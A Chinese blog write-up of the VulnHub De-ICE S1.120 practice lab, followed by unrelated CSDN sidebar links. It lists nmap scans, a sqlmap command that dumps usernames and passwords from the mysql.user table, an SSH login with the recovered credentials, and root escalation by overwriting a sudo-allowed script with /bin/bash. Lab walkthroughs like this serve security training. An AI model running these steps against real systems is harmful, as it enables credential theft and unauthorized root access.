De-ICE_S1.120复现

于 2024-09-14 15:03:23 发布
阅读量313 收藏 8
点赞数 5
分类专栏: vulnhub靶场练习 文章标签: 安全性测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_61982677/article/details/142258951
版权

环境搭建

De-ICE: S1.120 ~ VulnHub

添加网卡,修改 kali 为仅主机模式,靶机同样也设置为仅主机模式

kali 与 靶机 置于相同网卡下

靶机:192.168.1.120

攻击机(kali):192.168.1.128

主机扫描

nmap -sP 192.168.1.0/24 -T4

端口扫描

nmap -sV -p- 192.168.1.120

开放了三个端口 ftp21 ssh22 http80

访问 80 端口

漏洞探测

点击Add Product ->添加一个项目 ->点击 Submit

尝试 SQL 注入

可能为数字型注入,使用 sqlmap 获取用户名与密码

python3 sqlmap.py -u "http://192.168.1.120/products.php?id=1" --batch -D mysql -T user -C user,password --dump

使用 ssh 连接(ccoffee/abc123)

ssh ccoffee@192.168.1.120

kali 连接报错,使用本机连接成功

提权

查看可以使用的命令

sudo -l

尝试 SUID 提权

查找特殊权限文件

find / -perm -u=s -type f 2>/dev/null

发现一个.sh 文件

mv getlogs.sh getlogs.sh.bak
echo "/bin/bash" > getlogs.sh
chomod 777 getlogs.sh

sudo 执行 getlogs.sh 文件

sudo /home/ccoffee/scripts/getlogs.sh

提权成功

LYxianyu
关注
专栏目录
Vulnhub靶机系列:De-ICE: S1.120
汗的博客
03-30 1503
https://www.hackingarticles.in/hack-the-de-ice-s1-120-vm-boot-to-root/ 靶机地址 https://www.vulnhub.com/entry/de-ice-s1120,10/ 靶机设置 靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外i...
De-ICE_S1.120靶机复现
weixin_52956666的博客
07-30 352
将getlogs.sh更改为其他名字,将/bin/bash改为getlogs.sh。到/home/ccoffee/scripts路径下。将kali和靶机都设置为仅主机模式。因为ssh服务开启,尝试远程连接。发现存在免密getlogs.sh。点击Add product。输入发现存在反射型xss注入。查看mysql数据库的表。使用sqlmap查询。
Vulnhub靶机:driftingblues 2
qq_48904485的博客
01-13 603
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:driftingblues2(10.0.2.18)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/driftingblues-2,634/
【完结】囚生CYの备忘录(20221121-20230123)
热门推荐
一只热爱奔跑的程序猿
11-22 1万+
梦觉
UOS服务器版ARM架构openjdk-8-jdk_arm64.tar.gz
08-20
10. `libice-dev_2%3a1.0.9-2_arm64.deb`:Inter-Client Communication Conventions Library(ICE)的开发库,用于在X Window System中不同客户端间通信。 这些依赖包的提供,确保了OpenJDK 8在UOS服务器环境下能够...
infobright-4.0.7-0-x86_64-ice.zip
12-27
ice.rpm infobright社区版,本来就是开源的东西,还要资源分,没办法了,只能选最低2分, csdn禁止重复上传,于是采用了压缩包加密上传,zip解压,密码是2CcMBzP8,云盘分享:htt去ps://pa掉n.ba汉idu.co字m/s/1ge9...
Python库 | zeroc_ice-3.7.0-cp36-cp36m-win_amd64.whl
02-21
标题中的“zeroc_ice-3.7.0-cp36-cp36m-win_amd64.whl”是指ZeroMQ ICE(Inter Process Communication)的一个Python绑定库的特定版本,适用于Python 3.6解释器,并且是为64位Windows系统编译的。ZeroMQ是一个开源的...
第三方软件测评机构简析:软件安全性测试的方法和流程
卓码测评
09-12 587
随着信息技术的迅猛发展,软件在各行各业的应用日益普遍,软件安全性问题也愈加凸显。近几年来,频发的数据泄露、网络攻击事件,给企业和个人带来了不可估量的损失。这使得软件安全性测试成为软件开发过程中不可或缺的重要环节。
基于大模型技术的算力产业监测服务平台设计
09-17
内容概要:本文提出了一种新型算力产业监测服务平台的设计理念,运用国内自主研发的大模型技术支持,通过对传统技术的改进和完善,提出了三层架构的设计方法,即基础设施层(含向量数据库和模型训练)、大模型应用框架层(强化数据处理与多维关系挖掘)及业务层(如智能分析助手)。这种设计方案旨在提高算力产业发展监测与决策制定的质量。 适合人群:电信行业的从业人员及研究人员;算力产业链各环节管理者;政府相关机构和政策决策者。 使用场景及目标:在多种算力相关的应用场景(如云计算中心管理,数据中心监测,政策分析)中辅助决策者进行快速有效的信息获取和技术选择;助力算力产业发展方向的精确把控和战略调整。 其他说明:随着大模型技术的日臻成熟,该算力产业监测服务平台预计将进一步丰富自身的应用领域和服务深度,以促进算力行业更智慧化发展。
This_honeypot_supports_Telnet_and_SSH_two_protocol_FF-Pot.zip
最新发布
09-17
This_honeypot_supports_Telnet_and_SSH_two_protocol_FF-Pot
吉他谱_What I've Done - Linkin Park.pdf
09-17
初级入门吉他谱 guitar tab
吉他谱_Too sweet - Hozier.pdf
09-17
初级入门吉他谱 guitar tab
Linux使用的一些笔记,包括shell命令,软件,一些实用的网站的整理_Linux_note.zip
09-17
Linux使用的一些笔记,包括shell命令,软件,一些实用的网站的整理_Linux_note
基于ssm的机房预约系统设计与实现.docx
09-17
基于ssm的机房预约系统设计与实现.docx
app执行Linux命令_app-Linux-.zip
09-17
app执行Linux命令_app-Linux-
吉他谱_Would - Alice in Chains.pdf
09-17
初级入门吉他谱 guitar tab
吉他谱_Yellow Ledbetter - Pearl Jam.pdf
09-17
初级入门吉他谱 guitar tab
SELECT DISTINCT IceCream.name FROM IceCream INNER JOIN Tx_IceCream ON IceCream.icecream_id = Tx_IceCream.icecream_id INNER JOIN Tx ON Tx_IceCream.tx_id = Tx.tx_id WHERE Tx.month = 3;可以改成用left join 吗
06-07
是的,可以将上述 SQL 查询语句中的 INNER JOIN 改为 LEFT JOIN,如下所示: ``` SELECT DISTINCT IceCream.name FROM IceCream LEFT JOIN Tx_IceCream ON IceCream.icecream_id = Tx_IceCream.icecream_id LEFT JOIN Tx ON Tx_IceCream.tx_id = Tx.tx_id AND Tx.month = 3; ``` 这样的话,会返回所有的 IceCream 记录,即使它们没有与 Tx_IceCream 或 Tx 表中的记录匹配。同时,对于 Tx 表中月份不为 3 的记录,它们与 Tx_IceCream 表中的记录也会匹配成功,但由于 Tx 表中的筛选条件,它们最终不会被包含在结果中。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值